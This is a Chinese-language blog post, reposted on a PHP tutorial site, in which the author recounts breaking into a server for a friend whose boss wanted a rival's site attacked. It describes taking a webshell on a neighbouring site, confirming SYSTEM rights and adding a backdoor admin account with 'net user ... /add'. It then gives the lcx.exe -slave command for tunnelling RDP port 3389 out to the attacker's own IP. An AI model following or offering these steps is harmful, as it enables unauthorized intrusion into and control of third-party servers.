来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] 大家好 我是白菜今天朋友给我发了一个站让我提权 因为他公司的老总看到别人公司的野鸡太好了所以就找到我给他搞下来 要不然就会被开除了 听说 前提是我一分钱都没拿 真的就凑这...
大家好 我是白菜 今天朋友给我发了一个站让我提权 因为他公司的老总看到别人公司的野鸡太好了 简单的看了一下目标站 度娘 谷姐 各爬行都用上了 但是找不到什么可以利用的 所以就www.aizhan 了一下同服务器有多少站 结果呢就随便找了一个站简单的拿下了shell 废话完毕 咱们 直接上图吧
看到这样 貌似是个 system 权限 为了更加确定是不是这个权限 我 whoami了一下 呵呵 接下来省略了很多麻烦了吧 提权工具各种无视了 既然是这个权限直接建立帐号吧
Net user admin xxxxxxx /add 或者你想更直接的话 就直接修改上面的任意帐号密码 查看了一下端口
果断是内网 这个服务器本来就是开了3389的 由于是内网需要转发 在shell运行 路径\lcx.exe -slave 你的IP 你监听的端口 肉机IP 要转发的目标主机端口
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com